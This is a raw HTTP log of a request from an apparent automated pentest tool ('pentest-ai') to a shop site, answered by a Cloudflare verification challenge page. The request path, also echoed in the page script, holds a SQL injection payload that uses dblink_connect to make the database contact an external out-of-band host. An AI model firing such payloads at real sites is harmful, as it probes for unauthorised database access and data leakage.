REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%3B%20SELECT%20dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zhhnbqakcdf971.oast.fun%20user%3Dx%20password%3Dx%20dbname%3Dx%27%29%3B--%20-/assets/quick-order-list.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9887
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8478e8b22a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=aGOb0jNGucPz%2FDMPK8Lel3M4Uf7mCUmww3SXzq0oX6ylPgQKqiGyLTwBLIxq9%2F0C9n5mDyj%2FfNoRjSb626bIBWlz7sdxLXd5%2Bz1EDu4AICwvv4ps7XElSs0W2QPoCka%2BPg%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8478e8b22a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '.OiYR3aZkKTVJfflbjPpVfZFwq0z0vH9M.DjgyAOZpg-1784281167-1.2.1.1-gtrxM7ZD00_aRLzt9xX9rOoZXkFptbH2.ZEujDxUFU.0GFKC_FmnJCmcmSe2dRh_',cITimeS: '1784281167',cRay: 'a1c8478e8b22a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/';%20SELECT%20dblink_connect('host=h0cqg45t8jh21623dc0zhhnbqakcdf971.oast.fun%20user=x%20password=x%20dbname=x');--%20-/assets/quick-order-list.css?__cf_chl_tk=2G.aoVgX4CBJj5xctwlztrDw9DFSCGnTjomDcUS_S.U-1784281167-1.0.1.1-9M6KJQFExKJVjcVswl8Vf.BwI0w.xvR6znrPcep44oo",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/';%20SELECT%20dblink_connect('host=h0cqg45t8jh21623dc0zhhnbqakcdf971.oast.fun%20user=x%20password=x%20dbname=x');--%20-/assets/quick-order-list.css?__cf_chl_f_tk=2G.aoVgX4CBJj5xctwlztrDw9DFSCGnTjomDcUS_S.U-1784281167-1.0.1.1-9M6KJQFExKJVjcVswl8Vf.BwI0w.xvR6znrPcep44oo",md: '.yKcwENZnNPnn3bfqSU9A2RCsm7APSVN2ZQPr0Wfnrc-1784281167-1.2.1.1-wFy6K9U76o3Y.HtevNQ9ApZybbhqSbJUpNjnA19NvdSyRWCoFYKJDiWA0UT4gNzidbYGlpFNlRZE6Hog8x6m2SnL5gEbH7z_BFeFdiP9V95nVlkhZMWfMyMicpDwJ6qUyf7fiJtTfskcI0y7l0wPM213fc_16AGs5NvNM.TMi95CrNdVVLPr6sMSKfN26AScIX2IuyKcbz0eZ.DVp4hlWEzpZk4KDHa79nYQ9aNPeEl_Ihu1imSTYR63LKH3Gd2bPlc2l0jF0EZgYQJA5L1cDckEfOKv_ECvydUe3s.Uz3daS3CaZMBHWIZz35DuoHGCwRLfdMooD_7tS0_xo7YHNL4NTHHgYLL_ds.8YwhtQ8PolAnS7.D1XBklhuTIClxgiXCS6LU_pF4toErnGLLrfHxpsnc4295N3tw6pSpiuak8Dx2Iok0umyn0_BBkRBDbVXh9g01023evgLwPQ2JdiBYZ9tF4y.gPff3aQDwz6pbi073PloZ_26NCnLfDfnbVAbPNDHvMNkatdtWOZBcOY.SbEU_KA5S8E4zxSHFqqQifk2xdIgye2uFEff..fsAra3xDtf3y2b52QRy5o5U4do74VDsf9ByVkOjICEATVVdIbtzdj_EVBAdetowZLYjs20SW1qaZnamXwcUcyt6KrRscZyEMPfXZmBznVabyHnVGzyo_60q9TKqFrH6Y5.eTDSR54y2trPk3PgKdk_NofHFK0MW9jzpN9Vuh136I.PjXQytq.jks_1ATMbz0WUS_FjkRhfU.oh6QhRSUb.vwqlGm_ngUaYpNFBM.ThAbtO1WVg9NNyavZuGo3SRXMuFtvubdp1cbw1Swf9_FKxgL6mdZCYl6VUVTt6FT4Xvd.PGs9FW_Z.amD07rEVmVArGjRpynIeu2kmvHxQYAjpHqmAuEGO6MUbxtrl2ex1Enr0c5Zh6NM9TrTUT.vwkPQbGCMeiYhd4WoOMXuYEI7RQcEFTllQTE0q1pwM5mwGInKP.PdQ33XjojO0vbkMHd1ZEdojtBSqb5YXU0SVmxWXDnUwNy0c7UORAsb0a_wsYPcFmyU6VO4Fp2czzLxRMKz_W3NgysPcj0BlNrlzqfuzDWZFRxYRGVIolXIP_.y8NxEj7qGx0izcFbuJUHjCvpN_o7Zcv24G4s5UmdhyfgzXXbqllEVUTo6zFLIKIyZqn8SD1ecL65dT76IqCd6OHJW1HFyc1o1EF34mKZBrsKItaFxrNJFrk8aLGeyPWzXS2wZNmowUDqUHuPIH_uUflL7iGMFUCMwVIOCAks7hSWqwFS5PfaN7h0K_9Ww1l7yf02i6672Y5XvhF_2HO5Or0CW76j1UZ66thR4zRym08HZ4Mm3Q',mdrd: '58yX8Dw_xb_uRAS3LR3bfL1WthZBYUO1_2d45mnvWl4-1784281167-1.2.1.1-Htz4ySrUDhC881aJPdIgqN.Rr4aGiAJfDEhARuJJEmgGHxhyNounkoaS_XVD6ue3uB.MjPtDZKIiTopCzQK4v_3JAfjf0AEsc6vQsAVuoktWST0ZUPBnBhaj_ncao.PRvLn613DC3Yd7TIocMmAsPSKHFVxIv2wUp6uI6GscSPhngNTskxYuktTrXECvtGj95lusKgXCUvVQXroOlf751fUG2Zq0gLv9BAr5L.yWAYp2K9BfgbHx.1oK_Z3Iqj_W',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8478e8b22a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/';%20SELECT%20dblink_connect('host=h0cqg45t8jh21623dc0zhhnbqakcdf971.oast.fun%20user=x%20password=x%20dbname=x');--%20-/assets/quick-order-list.css?__cf_chl_rt_tk=2G.aoVgX4CBJj5xctwlztrDw9DFSCGnTjomDcUS_S.U-1784281167-1.0.1.1-9M6KJQFExKJVjcVswl8Vf.BwI0w.xvR6znrPcep44oo"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
